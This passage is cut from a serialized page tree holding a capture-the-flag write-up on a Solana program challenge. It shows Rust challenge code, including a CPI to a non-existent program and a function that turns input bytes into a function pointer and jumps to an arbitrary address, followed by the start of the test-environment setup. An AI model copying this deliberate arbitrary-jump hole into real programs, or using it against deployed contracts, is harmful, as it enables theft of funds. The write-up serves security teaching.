val",{"type":27,"tag":207,"props":48017,"children":48018},{"style":226},[48019],{"type":33,"value":229},{"type":27,"tag":207,"props":48021,"children":48022},{"style":238},[48023],{"type":33,"value":47900},{"type":27,"tag":207,"props":48025,"children":48026},{"style":226},[48027],{"type":33,"value":10768},{"type":27,"tag":207,"props":48029,"children":48030},{"style":238},[48031],{"type":33,"value":47909},{"type":27,"tag":207,"props":48033,"children":48034},{"style":226},[48035],{"type":33,"value":10768},{"type":27,"tag":207,"props":48037,"children":48038},{"style":1335},[48039],{"type":33,"value":47918},{"type":27,"tag":207,"props":48041,"children":48042},{"style":226},[48043],{"type":33,"value":10768},{"type":27,"tag":207,"props":48045,"children":48046},{"style":238},[48047],{"type":33,"value":47927},{"type":27,"tag":207,"props":48049,"children":48050},{"style":8920},[48051],{"type":33,"value":10709},{"type":27,"tag":207,"props":48053,"children":48054},{"style":238},[48055],{"type":33,"value":4685},{"type":27,"tag":207,"props":48057,"children":48058},{"style":232},[48059],{"type":33,"value":3578},{"type":27,"tag":207,"props":48061,"children":48062},{"style":238},[48063],{"type":33,"value":30333},{"type":27,"tag":207,"props":48065,"children":48066},{"style":8920},[48067],{"type":33,"value":15323},{"type":27,"tag":207,"props":48069,"children":48070},{"style":238},[48071],{"type":33,"value":14893},{"type":27,"tag":207,"props":48073,"children":48074},{"style":220},[48075],{"type":33,"value":9468},{"type":27,"tag":207,"props":48077,"children":48078},{"style":238},[48079],{"type":33,"value":11019},{"type":27,"tag":207,"props":48081,"children":48082},{"style":232},[48083],{"type":33,"value":3578},{"type":27,"tag":207,"props":48085,"children":48086},{"style":226},[48087],{"type":33,"value":10340},{"type":27,"tag":207,"props":48089,"children":48090},{"style":232},[48091],{"type":33,"value":3070},{"type":27,"tag":207,"props":48093,"children":48094},{"style":238},[48095],{"type":33,"value":22686},{"type":27,"tag":207,"props":48097,"children":48098},{"style":226},[48099],{"type":33,"value":1041},{"type":27,"tag":207,"props":48101,"children":48102},{"style":1335},[48103],{"type":33,"value":33427},{"type":27,"tag":207,"props":48105,"children":48106},{"style":238},[48107],{"type":33,"value":21155},{"type":27,"tag":207,"props":48109,"children":48110},{"style":226},[48111],{"type":33,"value":1041},{"type":27,"tag":207,"props":48113,"children":48114},{"style":1335},[48115],{"type":33,"value":10952},{"type":27,"tag":207,"props":48117,"children":48118},{"style":238},[48119],{"type":33,"value":22700},{"type":27,"tag":207,"props":48121,"children":48122},{"class":209,"line":867},[48123,48128,48132,48137,48141,48145],{"type":27,"tag":207,"props":48124,"children":48125},{"style":220},[48126],{"type":33,"value":48127}," ptr",{"type":27,"tag":207,"props":48129,"children":48130},{"style":226},[48131],{"type":33,"value":1041},{"type":27,"tag":207,"props":48133,"children":48134},{"style":1335},[48135],{"type":33,"value":48136},"write_volatile",{"type":27,"tag":207,"props":48138,"children":48139},{"style":238},[48140],{"type":33,"value":1343},{"type":27,"tag":207,"props":48142,"children":48143},{"style":220},[48144],{"type":33,"value":19909},{"type":27,"tag":207,"props":48146,"children":48147},{"style":238},[48148],{"type":33,"value":1455},{"type":27,"tag":207,"props":48150,"children":48151},{"class":209,"line":892},[48152],{"type":27,"tag":207,"props":48153,"children":48154},{"style":238},[48155],{"type":33,"value":10645},{"type":27,"tag":207,"props":48157,"children":48158},{"class":209,"line":1475},[48159],{"type":27,"tag":207,"props":48160,"children":48161},{"style":238},[48162],{"type":33,"value":451},{"type":27,"tag":12719,"props":48164,"children":48165},{"start":244},[48166],{"type":27,"tag":1232,"props":48167,"children":48168},{},[48169,48170,48176],{"type":33,"value":14762},{"type":27,"tag":84,"props":48171,"children":48173},{"className":48172},[],[48174],{"type":33,"value":48175},"data[0] == 1",{"type":33,"value":48177},", a CPI to a non-existent program is executed:",{"type":27,"tag":101,"props":48179,"children":48181},{"className":10270,"code":48180,"language":10269,"meta":7,"style":7},"#[inline(never)]\npub fn call(data: &[u8]) {\n let ix = Instruction {\n program_id: pubkey!(\"osecio5555555555555551111111111111111111111\"),\n data: data.try_into().unwrap(),\n accounts: vec![]\n };\n\n invoke_signed_unchecked(\n &ix,\n &[],\n &[],\n ).unwrap();\n}\n",[48182],{"type":27,"tag":84,"props":48183,"children":48184},{"__ignoreMap":7},[48185,48192,48236,48261,48291,48331,48352,48359,48366,48378,48394,48406,48417,48436],{"type":27,"tag":207,"props":48186,"children":48187},{"class":209,"line":210},[48188],{"type":27,"tag":207,"props":48189,"children":48190},{"style":238},[48191],{"type":33,"value":47824},{"type":27,"tag":207,"props":48193,"children":48194},{"class":209,"line":244},[48195,48199,48203,48208,48212,48216,48220,48224,48228,48232],{"type":27,"tag":207,"props":48196,"children":48197},{"style":214},[48198],{"type":33,"value":20967},{"type":27,"tag":207,"props":48200,"children":48201},{"style":214},[48202],{"type":33,"value":20972},{"type":27,"tag":207,"props":48204,"children":48205},{"style":1335},[48206],{"type":33,"value":48207}," call",{"type":27,"tag":207,"props":48209,"children":48210},{"style":238},[48211],{"type":33,"value":1343},{"type":27,"tag":207,"props":48213,"children":48214},{"style":220},[48215],{"type":33,"value":9468},{"type":27,"tag":207,"props":48217,"children":48218},{"style":226},[48219],{"type":33,"value":736},{"type":27,"tag":207,"props":48221,"children":48222},{"style":226},[48223],{"type":33,"value":14423},{"type":27,"tag":207,"props":48225,"children":48226},{"style":238},[48227],{"type":33,"value":11019},{"type":27,"tag":207,"props":48229,"children":48230},{"style":8920},[48231],{"type":33,"value":10709},{"type":27,"tag":207,"props":48233,"children":48234},{"style":238},[48235],{"type":33,"value":47869},{"type":27,"tag":207,"props":48237,"children":48238},{"class":209,"line":270},[48239,48243,48248,48252,48257],{"type":27,"tag":207,"props":48240,"children":48241},{"style":214},[48242],{"type":33,"value":10290},{"type":27,"tag":207,"props":48244,"children":48245},{"style":220},[48246],{"type":33,"value":48247}," ix",{"type":27,"tag":207,"props":48249,"children":48250},{"style":226},[48251],{"type":33,"value":229},{"type":27,"tag":207,"props":48253,"children":48254},{"style":8920},[48255],{"type":33,"value":48256}," Instruction",{"type":27,"tag":207,"props":48258,"children":48259},{"style":238},[48260],{"type":33,"value":384},{"type":27,"tag":207,"props":48262,"children":48263},{"class":209,"line":296},[48264,48269,48273,48278,48282,48287],{"type":27,"tag":207,"props":48265,"children":48266},{"style":220},[48267],{"type":33,"value":48268}," program_id",{"type":27,"tag":207,"props":48270,"children":48271},{"style":226},[48272],{"type":33,"value":736},{"type":27,"tag":207,"props":48274,"children":48275},{"style":1335},[48276],{"type":33,"value":48277}," pubkey!",{"type":27,"tag":207,"props":48279,"children":48280},{"style":238},[48281],{"type":33,"value":1343},{"type":27,"tag":207,"props":48283,"children":48284},{"style":1325},[48285],{"type":33,"value":48286},"\"osecio5555555555555551111111111111111111111\"",{"type":27,"tag":207,"props":48288,"children":48289},{"style":238},[48290],{"type":33,"value":14018},{"type":27,"tag":207,"props":48292,"children":48293},{"class":209,"line":445},[48294,48299,48303,48307,48311,48315,48319,48323,48327],{"type":27,"tag":207,"props":48295,"children":48296},{"style":220},[48297],{"type":33,"value":48298}," data",{"type":27,"tag":207,"props":48300,"children":48301},{"style":226},[48302],{"type":33,"value":736},{"type":27,"tag":207,"props":48304,"children":48305},{"style":220},[48306],{"type":33,"value":22379},{"type":27,"tag":207,"props":48308,"children":48309},{"style":226},[48310],{"type":33,"value":1041},{"type":27,"tag":207,"props":48312,"children":48313},{"style":1335},[48314],{"type":33,"value":33427},{"type":27,"tag":207,"props":48316,"children":48317},{"style":238},[48318],{"type":33,"value":21155},{"type":27,"tag":207,"props":48320,"children":48321},{"style":226},[48322],{"type":33,"value":1041},{"type":27,"tag":207,"props":48324,"children":48325},{"style":1335},[48326],{"type":33,"value":10952},{"type":27,"tag":207,"props":48328,"children":48329},{"style":238},[48330],{"type":33,"value":10778},{"type":27,"tag":207,"props":48332,"children":48333},{"class":209,"line":867},[48334,48339,48343,48347],{"type":27,"tag":207,"props":48335,"children":48336},{"style":220},[48337],{"type":33,"value":48338}," accounts",{"type":27,"tag":207,"props":48340,"children":48341},{"style":226},[48342],{"type":33,"value":736},{"type":27,"tag":207,"props":48344,"children":48345},{"style":1335},[48346],{"type":33,"value":11014},{"type":27,"tag":207,"props":48348,"children":48349},{"style":238},[48350],{"type":33,"value":48351},"[]\n",{"type":27,"tag":207,"props":48353,"children":48354},{"class":209,"line":892},[48355],{"type":27,"tag":207,"props":48356,"children":48357},{"style":238},[48358],{"type":33,"value":46243},{"type":27,"tag":207,"props":48360,"children":48361},{"class":209,"line":1475},[48362],{"type":27,"tag":207,"props":48363,"children":48364},{"emptyLinePlaceholder":19},[48365],{"type":33,"value":2062},{"type":27,"tag":207,"props":48367,"children":48368},{"class":209,"line":2065},[48369,48374],{"type":27,"tag":207,"props":48370,"children":48371},{"style":1335},[48372],{"type":33,"value":48373}," invoke_signed_unchecked",{"type":27,"tag":207,"props":48375,"children":48376},{"style":238},[48377],{"type":33,"value":9090},{"type":27,"tag":207,"props":48379,"children":48380},{"class":209,"line":2092},[48381,48385,48390],{"type":27,"tag":207,"props":48382,"children":48383},{"style":226},[48384],{"type":33,"value":10758},{"type":27,"tag":207,"props":48386,"children":48387},{"style":220},[48388],{"type":33,"value":48389},"ix",{"type":27,"tag":207,"props":48391,"children":48392},{"style":238},[48393],{"type":33,"value":1842},{"type":27,"tag":207,"props":48395,"children":48396},{"class":209,"line":2130},[48397,48401],{"type":27,"tag":207,"props":48398,"children":48399},{"style":226},[48400],{"type":33,"value":10758},{"type":27,"tag":207,"props":48402,"children":48403},{"style":238},[48404],{"type":33,"value":48405},"[],\n",{"type":27,"tag":207,"props":48407,"children":48408},{"class":209,"line":2168},[48409,48413],{"type":27,"tag":207,"props":48410,"children":48411},{"style":226},[48412],{"type":33,"value":10758},{"type":27,"tag":207,"props":48414,"children":48415},{"style":238},[48416],{"type":33,"value":48405},{"type":27,"tag":207,"props":48418,"children":48419},{"class":209,"line":4095},[48420,48424,48428,48432],{"type":27,"tag":207,"props":48421,"children":48422},{"style":238},[48423],{"type":33,"value":10943},{"type":27,"tag":207,"props":48425,"children":48426},{"style":226},[48427],{"type":33,"value":1041},{"type":27,"tag":207,"props":48429,"children":48430},{"style":1335},[48431],{"type":33,"value":10952},{"type":27,"tag":207,"props":48433,"children":48434},{"style":238},[48435],{"type":33,"value":4301},{"type":27,"tag":207,"props":48437,"children":48438},{"class":209,"line":4103},[48439],{"type":27,"tag":207,"props":48440,"children":48441},{"style":238},[48442],{"type":33,"value":451},{"type":27,"tag":12719,"props":48444,"children":48445},{"start":270},[48446],{"type":27,"tag":1232,"props":48447,"children":48448},{},[48449,48451,48457],{"type":33,"value":48450},"Finally, if ",{"type":27,"tag":84,"props":48452,"children":48454},{"className":48453},[],[48455],{"type":33,"value":48456},"data[0]",{"type":33,"value":48458}," is neither 0 nor 1, a function that lets you jump to an arbitrary address, passing an arbitrary value as the first parameter is executed:",{"type":27,"tag":101,"props":48460,"children":48462},{"className":10270,"code":48461,"language":10269,"meta":7,"style":7},"#[inline(never)]\npub fn process(mut data: &[u8]) {\n unsafe {\n let ptr = std::mem::transmute::\u003C[u8; 8], fn(u64)>(data[..8].try_into().unwrap());\n let val = std::mem::transmute::\u003C[u8; 8], u64>(data[8..16].try_into().unwrap());\n ptr(val);\n\n data = &data[16..];\n\n let ptr = std::mem::transmute::\u003C[u8; 8], fn(u64)>(data[..8].try_into().unwrap());\n let val = std::mem::transmute::\u003C[u8; 8], u64>(data[8..16].try_into().unwrap());\n ptr(val);\n }\n}\n",[48463],{"type":27,"tag":84,"props":48464,"children":48465},{"__ignoreMap":7},[48466,48473,48521,48532,48652,48767,48786,48793,48828,48835,48954,49069,49088,49095],{"type":27,"tag":207,"props":48467,"children":48468},{"class":209,"line":210},[48469],{"type":27,"tag":207,"props":48470,"children":48471},{"style":238},[48472],{"type":33,"value":47824},{"type":27,"tag":207,"props":48474,"children":48475},{"class":209,"line":244},[48476,48480,48484,48489,48493,48497,48501,48505,48509,48513,48517],{"type":27,"tag":207,"props":48477,"children":48478},{"style":214},[48479],{"type":33,"value":20967},{"type":27,"tag":207,"props":48481,"children":48482},{"style":214},[48483],{"type":33,"value":20972},{"type":27,"tag":207,"props":48485,"children":48486},{"style":1335},[48487],{"type":33,"value":48488}," process",{"type":27,"tag":207,"props":48490,"children":48491},{"style":238},[48492],{"type":33,"value":1343},{"type":27,"tag":207,"props":48494,"children":48495},{"style":214},[48496],{"type":33,"value":11009},{"type":27,"tag":207,"props":48498,"children":48499},{"style":220},[48500],{"type":33,"value":22379},{"type":27,"tag":207,"props":48502,"children":48503},{"style":226},[48504],{"type":33,"value":736},{"type":27,"tag":207,"props":48506,"children":48507},{"style":226},[48508],{"type":33,"value":14423},{"type":27,"tag":207,"props":48510,"children":48511},{"style":238},[48512],{"type":33,"value":11019},{"type":27,"tag":207,"props":48514,"children":48515},{"style":8920},[48516],{"type":33,"value":10709},{"type":27,"tag":207,"props":48518,"children":48519},{"style":238},[48520],{"type":33,"value":47869},{"type":27,"tag":207,"props":48522,"children":48523},{"class":209,"line":270},[48524,48528],{"type":27,"tag":207,"props":48525,"children":48526},{"style":214},[48527],{"type":33,"value":21109},{"type":27,"tag":207,"props":48529,"children":48530},{"style":238},[48531],{"type":33,"value":384},{"type":27,"tag":207,"props":48533,"children":48534},{"class":209,"line":296},[48535,48539,48543,48547,48551,48555,48559,48563,48567,48571,48575,48579,48583,48587,48591,48595,48599,48603,48608,48612,48616,48620,48624,48628,48632,48636,48640,48644,48648],{"type":27,"tag":207,"props":48536,"children":48537},{"style":214},[48538],{"type":33,"value":10353},{"type":27,"tag":207,"props":48540,"children":48541},{"style":220},[48542],{"type":33,"value":21133},{"type":27,"tag":207,"props":48544,"children":48545},{"style":226},[48546],{"type":33,"value":229},{"type":27,"tag":207,"props":48548,"children":48549},{"style":238},[48550],{"type":33,"value":47900},{"type":27,"tag":207,"props":48552,"children":48553},{"style":226},[48554],{"type":33,"value":10768},{"type":27,"tag":207,"props":48556,"children":48557},{"style":238},[48558],{"type":33,"value":47909},{"type":27,"tag":207,"props":48560,"children":48561},{"style":226},[48562],{"type":33,"value":10768},{"type":27,"tag":207,"props":48564,"children":48565},{"style":1335},[48566],{"type":33,"value":47918},{"type":27,"tag":207,"props":48568,"children":48569},{"style":226},[48570],{"type":33,"value":10768},{"type":27,"tag":207,"props":48572,"children":48573},{"style":238},[48574],{"type":33,"value":47927},{"type":27,"tag":207,"props":48576,"children":48577},{"style":8920},[48578],{"type":33,"value":10709},{"type":27,"tag":207,"props":48580,"children":48581},{"style":238},[48582],{"type":33,"value":4685},{"type":27,"tag":207,"props":48584,"children":48585},{"style":232},[48586],{"type":33,"value":3578},{"type":27,"tag":207,"props":48588,"children":48589},{"style":238},[48590],{"type":33,"value":30333},{"type":27,"tag":207,"props":48592,"children":48593},{"style":214},[48594],{"type":33,"value":27538},{"type":27,"tag":207,"props":48596,"children":48597},{"style":238},[48598],{"type":33,"value":1343},{"type":27,"tag":207,"props":48600,"children":48601},{"style":8920},[48602],{"type":33,"value":15323},{"type":27,"tag":207,"props":48604,"children":48605},{"style":238},[48606],{"type":33,"value":48607},")>(",{"type":27,"tag":207,"props":48609,"children":48610},{"style":220},[48611],{"type":33,"value":9468},{"type":27,"tag":207,"props":48613,"children":48614},{"style":238},[48615],{"type":33,"value":11019},{"type":27,"tag":207,"props":48617,"children":48618},{"style":226},[48619],{"type":33,"value":10340},{"type":27,"tag":207,"props":48621,"children":48622},{"style":232},[48623],{"type":33,"value":3578},{"type":27,"tag":207,"props":48625,"children":48626},{"style":238},[48627],{"type":33,"value":22686},{"type":27,"tag":207,"props":48629,"children":48630},{"style":226},[48631],{"type":33,"value":1041},{"type":27,"tag":207,"props":48633,"children":48634},{"style":1335},[48635],{"type":33,"value":33427},{"type":27,"tag":207,"props":48637,"children":48638},{"style":238},[48639],{"type":33,"value":21155},{"type":27,"tag":207,"props":48641,"children":48642},{"style":226},[48643],{"type":33,"value":1041},{"type":27,"tag":207,"props":48645,"children":48646},{"style":1335},[48647],{"type":33,"value":10952},{"type":27,"tag":207,"props":48649,"children":48650},{"style":238},[48651],{"type":33,"value":22700},{"type":27,"tag":207,"props":48653,"children":48654},{"class":209,"line":445},[48655,48659,48663,48667,48671,48675,48679,48683,48687,48691,48695,48699,48703,48707,48711,48715,48719,48723,48727,48731,48735,48739,48743,48747,48751,48755,48759,48763],{"type":27,"tag":207,"props":48656,"children":48657},{"style":214},[48658],{"type":33,"value":10353},{"type":27,"tag":207,"props":48660,"children":48661},{"style":220},[48662],{"type":33,"value":48015},{"type":27,"tag":207,"props":48664,"children":48665},{"style":226},[48666],{"type":33,"value":229},{"type":27,"tag":207,"props":48668,"children":48669},{"style":238},[48670],{"type":33,"value":47900},{"type":27,"tag":207,"props":48672,"children":48673},{"style":226},[48674],{"type":33,"value":10768},{"type":27,"tag":207,"props":48676,"children":48677},{"style":238},[48678],{"type":33,"value":47909},{"type":27,"tag":207,"props":48680,"children":48681},{"style":226},[48682],{"type":33,"value":10768},{"type":27,"tag":207,"props":48684,"children":48685},{"style":1335},[48686],{"type":33,"value":47918},{"type":27,"tag":207,"props":48688,"children":48689},{"style":226},[48690],{"type":33,"value":10768},{"type":27,"tag":207,"props":48692,"children":48693},{"style":238},[48694],{"type":33,"value":47927},{"type":27,"tag":207,"props":48696,"children":48697},{"style":8920},[48698],{"type":33,"value":10709},{"type":27,"tag":207,"props":48700,"children":48701},{"style":238},[48702],{"type":33,"value":4685},{"type":27,"tag":207,"props":48704,"children":48705},{"style":232},[48706],{"type":33,"value":3578},{"type":27,"tag":207,"props":48708,"children":48709},{"style":238},[48710],{"type":33,"value":30333},{"type":27,"tag":207,"props":48712,"children":48713},{"style":8920},[48714],{"type":33,"value":15323},{"type":27,"tag":207,"props":48716,"children":48717},{"style":238},[48718],{"type":33,"value":14893},{"type":27,"tag":207,"props":48720,"children":48721},{"style":220},[48722],{"type":33,"value":9468},{"type":27,"tag":207,"props":48724,"children":48725},{"style":238},[48726],{"type":33,"value":11019},{"type":27,"tag":207,"props":48728,"children":48729},{"style":232},[48730],{"type":33,"value":3578},{"type":27,"tag":207,"props":48732,"children":48733},{"style":226},[48734],{"type":33,"value":10340},{"type":27,"tag":207,"props":48736,"children":48737},{"style":232},[48738],{"type":33,"value":3070},{"type":27,"tag":207,"props":48740,"children":48741},{"style":238},[48742],{"type":33,"value":22686},{"type":27,"tag":207,"props":48744,"children":48745},{"style":226},[48746],{"type":33,"value":1041},{"type":27,"tag":207,"props":48748,"children":48749},{"style":1335},[48750],{"type":33,"value":33427},{"type":27,"tag":207,"props":48752,"children":48753},{"style":238},[48754],{"type":33,"value":21155},{"type":27,"tag":207,"props":48756,"children":48757},{"style":226},[48758],{"type":33,"value":1041},{"type":27,"tag":207,"props":48760,"children":48761},{"style":1335},[48762],{"type":33,"value":10952},{"type":27,"tag":207,"props":48764,"children":48765},{"style":238},[48766],{"type":33,"value":22700},{"type":27,"tag":207,"props":48768,"children":48769},{"class":209,"line":867},[48770,48774,48778,48782],{"type":27,"tag":207,"props":48771,"children":48772},{"style":1335},[48773],{"type":33,"value":48127},{"type":27,"tag":207,"props":48775,"children":48776},{"style":238},[48777],{"type":33,"value":1343},{"type":27,"tag":207,"props":48779,"children":48780},{"style":220},[48781],{"type":33,"value":19909},{"type":27,"tag":207,"props":48783,"children":48784},{"style":238},[48785],{"type":33,"value":1455},{"type":27,"tag":207,"props":48787,"children":48788},{"class":209,"line":892},[48789],{"type":27,"tag":207,"props":48790,"children":48791},{"emptyLinePlaceholder":19},[48792],{"type":33,"value":2062},{"type":27,"tag":207,"props":48794,"children":48795},{"class":209,"line":1475},[48796,48800,48804,48808,48812,48816,48820,48824],{"type":27,"tag":207,"props":48797,"children":48798},{"style":220},[48799],{"type":33,"value":48298},{"type":27,"tag":207,"props":48801,"children":48802},{"style":226},[48803],{"type":33,"value":229},{"type":27,"tag":207,"props":48805,"children":48806},{"style":226},[48807],{"type":33,"value":14423},{"type":27,"tag":207,"props":48809,"children":48810},{"style":220},[48811],{"type":33,"value":9468},{"type":27,"tag":207,"props":48813,"children":48814},{"style":238},[48815],{"type":33,"value":11019},{"type":27,"tag":207,"props":48817,"children":48818},{"style":232},[48819],{"type":33,"value":3070},{"type":27,"tag":207,"props":48821,"children":48822},{"style":226},[48823],{"type":33,"value":10340},{"type":27,"tag":207,"props":48825,"children":48826},{"style":238},[48827],{"type":33,"value":38834},{"type":27,"tag":207,"props":48829,"children":48830},{"class":209,"line":2065},[48831],{"type":27,"tag":207,"props":48832,"children":48833},{"emptyLinePlaceholder":19},[48834],{"type":33,"value":2062},{"type":27,"tag":207,"props":48836,"children":48837},{"class":209,"line":2092},[48838,48842,48846,48850,48854,48858,48862,48866,48870,48874,48878,48882,48886,48890,48894,48898,48902,48906,48910,48914,48918,48922,48926,48930,48934,48938,48942,48946,48950],{"type":27,"tag":207,"props":48839,"children":48840},{"style":214},[48841],{"type":33,"value":10353},{"type":27,"tag":207,"props":48843,"children":48844},{"style":220},[48845],{"type":33,"value":21133},{"type":27,"tag":207,"props":48847,"children":48848},{"style":226},[48849],{"type":33,"value":229},{"type":27,"tag":207,"props":48851,"children":48852},{"style":238},[48853],{"type":33,"value":47900},{"type":27,"tag":207,"props":48855,"children":48856},{"style":226},[48857],{"type":33,"value":10768},{"type":27,"tag":207,"props":48859,"children":48860},{"style":238},[48861],{"type":33,"value":47909},{"type":27,"tag":207,"props":48863,"children":48864},{"style":226},[48865],{"type":33,"value":10768},{"type":27,"tag":207,"props":48867,"children":48868},{"style":1335},[48869],{"type":33,"value":47918},{"type":27,"tag":207,"props":48871,"children":48872},{"style":226},[48873],{"type":33,"value":10768},{"type":27,"tag":207,"props":48875,"children":48876},{"style":238},[48877],{"type":33,"value":47927},{"type":27,"tag":207,"props":48879,"children":48880},{"style":8920},[48881],{"type":33,"value":10709},{"type":27,"tag":207,"props":48883,"children":48884},{"style":238},[48885],{"type":33,"value":4685},{"type":27,"tag":207,"props":48887,"children":48888},{"style":232},[48889],{"type":33,"value":3578},{"type":27,"tag":207,"props":48891,"children":48892},{"style":238},[48893],{"type":33,"value":30333},{"type":27,"tag":207,"props":48895,"children":48896},{"style":214},[48897],{"type":33,"value":27538},{"type":27,"tag":207,"props":48899,"children":48900},{"style":238},[48901],{"type":33,"value":1343},{"type":27,"tag":207,"props":48903,"children":48904},{"style":8920},[48905],{"type":33,"value":15323},{"type":27,"tag":207,"props":48907,"children":48908},{"style":238},[48909],{"type":33,"value":48607},{"type":27,"tag":207,"props":48911,"children":48912},{"style":220},[48913],{"type":33,"value":9468},{"type":27,"tag":207,"props":48915,"children":48916},{"style":238},[48917],{"type":33,"value":11019},{"type":27,"tag":207,"props":48919,"children":48920},{"style":226},[48921],{"type":33,"value":10340},{"type":27,"tag":207,"props":48923,"children":48924},{"style":232},[48925],{"type":33,"value":3578},{"type":27,"tag":207,"props":48927,"children":48928},{"style":238},[48929],{"type":33,"value":22686},{"type":27,"tag":207,"props":48931,"children":48932},{"style":226},[48933],{"type":33,"value":1041},{"type":27,"tag":207,"props":48935,"children":48936},{"style":1335},[48937],{"type":33,"value":33427},{"type":27,"tag":207,"props":48939,"children":48940},{"style":238},[48941],{"type":33,"value":21155},{"type":27,"tag":207,"props":48943,"children":48944},{"style":226},[48945],{"type":33,"value":1041},{"type":27,"tag":207,"props":48947,"children":48948},{"style":1335},[48949],{"type":33,"value":10952},{"type":27,"tag":207,"props":48951,"children":48952},{"style":238},[48953],{"type":33,"value":22700},{"type":27,"tag":207,"props":48955,"children":48956},{"class":209,"line":2130},[48957,48961,48965,48969,48973,48977,48981,48985,48989,48993,48997,49001,49005,49009,49013,49017,49021,49025,49029,49033,49037,49041,49045,49049,49053,49057,49061,49065],{"type":27,"tag":207,"props":48958,"children":48959},{"style":214},[48960],{"type":33,"value":10353},{"type":27,"tag":207,"props":48962,"children":48963},{"style":220},[48964],{"type":33,"value":48015},{"type":27,"tag":207,"props":48966,"children":48967},{"style":226},[48968],{"type":33,"value":229},{"type":27,"tag":207,"props":48970,"children":48971},{"style":238},[48972],{"type":33,"value":47900},{"type":27,"tag":207,"props":48974,"children":48975},{"style":226},[48976],{"type":33,"value":10768},{"type":27,"tag":207,"props":48978,"children":48979},{"style":238},[48980],{"type":33,"value":47909},{"type":27,"tag":207,"props":48982,"children":48983},{"style":226},[48984],{"type":33,"value":10768},{"type":27,"tag":207,"props":48986,"children":48987},{"style":1335},[48988],{"type":33,"value":47918},{"type":27,"tag":207,"props":48990,"children":48991},{"style":226},[48992],{"type":33,"value":10768},{"type":27,"tag":207,"props":48994,"children":48995},{"style":238},[48996],{"type":33,"value":47927},{"type":27,"tag":207,"props":48998,"children":48999},{"style":8920},[49000],{"type":33,"value":10709},{"type":27,"tag":207,"props":49002,"children":49003},{"style":238},[49004],{"type":33,"value":4685},{"type":27,"tag":207,"props":49006,"children":49007},{"style":232},[49008],{"type":33,"value":3578},{"type":27,"tag":207,"props":49010,"children":49011},{"style":238},[49012],{"type":33,"value":30333},{"type":27,"tag":207,"props":49014,"children":49015},{"style":8920},[49016],{"type":33,"value":15323},{"type":27,"tag":207,"props":49018,"children":49019},{"style":238},[49020],{"type":33,"value":14893},{"type":27,"tag":207,"props":49022,"children":49023},{"style":220},[49024],{"type":33,"value":9468},{"type":27,"tag":207,"props":49026,"children":49027},{"style":238},[49028],{"type":33,"value":11019},{"type":27,"tag":207,"props":49030,"children":49031},{"style":232},[49032],{"type":33,"value":3578},{"type":27,"tag":207,"props":49034,"children":49035},{"style":226},[49036],{"type":33,"value":10340},{"type":27,"tag":207,"props":49038,"children":49039},{"style":232},[49040],{"type":33,"value":3070},{"type":27,"tag":207,"props":49042,"children":49043},{"style":238},[49044],{"type":33,"value":22686},{"type":27,"tag":207,"props":49046,"children":49047},{"style":226},[49048],{"type":33,"value":1041},{"type":27,"tag":207,"props":49050,"children":49051},{"style":1335},[49052],{"type":33,"value":33427},{"type":27,"tag":207,"props":49054,"children":49055},{"style":238},[49056],{"type":33,"value":21155},{"type":27,"tag":207,"props":49058,"children":49059},{"style":226},[49060],{"type":33,"value":1041},{"type":27,"tag":207,"props":49062,"children":49063},{"style":1335},[49064],{"type":33,"value":10952},{"type":27,"tag":207,"props":49066,"children":49067},{"style":238},[49068],{"type":33,"value":22700},{"type":27,"tag":207,"props":49070,"children":49071},{"class":209,"line":2168},[49072,49076,49080,49084],{"type":27,"tag":207,"props":49073,"children":49074},{"style":1335},[49075],{"type":33,"value":48127},{"type":27,"tag":207,"props":49077,"children":49078},{"style":238},[49079],{"type":33,"value":1343},{"type":27,"tag":207,"props":49081,"children":49082},{"style":220},[49083],{"type":33,"value":19909},{"type":27,"tag":207,"props":49085,"children":49086},{"style":238},[49087],{"type":33,"value":1455},{"type":27,"tag":207,"props":49089,"children":49090},{"class":209,"line":4095},[49091],{"type":27,"tag":207,"props":49092,"children":49093},{"style":238},[49094],{"type":33,"value":10645},{"type":27,"tag":207,"props":49096,"children":49097},{"class":209,"line":4103},[49098],{"type":27,"tag":207,"props":49099,"children":49100},{"style":238},[49101],{"type":33,"value":451},{"type":27,"tag":58,"props":49103,"children":49105},{"id":49104},"test-environment",[49106],{"type":33,"value":49107},"Test Environment",{"type":27,"tag":36,"props":49109,"children":49110},{},[49111],{"type":33,"value":49112},"To understand our capabilites regarding interaction with the program and determine what is necessary to get the flag, we must analyze the test environment.",{"type":27,"tag":36,"props":49114,"children":49115},{},[49116,49118,49124],{"type":33,"value":49117},"When you connect to the server through a tcp connection, ",{"type":27,"tag":84,"props":49119,"children":49121},{"className":49120},[],[49122],{"type":33,"value":49123},"framework/src/main.rs::handle_connection",{"type":33,"value":49125}," gets executed, which does the following:",{"type":27,"tag":12719,"props":49127,"children":49128},{},[49129],{"type":27,"tag":1232,"props":49130,"children":49131},{},[49132],{"type":33,"value":49133},"Creates a new Solana local node",{"type":27,"tag":101,"props":49135,"children":49137},{"className":10270,"code":49136,"language":10269,"meta":7,"style":7},"let mut builder = ChallengeBuilder::try_from(socket.try_clone().unwrap()).unwrap();\nassert!(builder.add_program(\"/path/to/chall.so\", Some(chall::ID)) == chall::ID);\nlet mut chall = builder.build().await;\n",[49138],{"type":27,"tag":84,"props":49139,"children":49140},{"__ignoreMap":7},[49141,49222,49298],{"type":27,"tag":207,"props":49142,"children":49143},{"class":209,"line":210},[49144,49148,49152,49157,49161,49166,49170,49175,49179,49184,49188,49193,49197,49201,49205,49210,49214,49218],{"type":27,"tag":207,"props":49145,"children":49146},{"style":214},[49147],{"type":33,"value":217},{"type":27,"tag":207,"props":49149,"children":49150},{"style":214},[49151],{"type":33,"value":10295},{"type":27,"tag":207,"props":49153,"children":49154},{"style":220},[49155],{"type":33,"value":49156}," builder",{"type":27,"tag":207,"props":49158,"children":49159},{"style":226},[49160],{"type":33,"value":229},{"type":27,"tag":207,"props":49162,"children":49163},{"style":8920},[49164],{"type":33,"value":49165}," 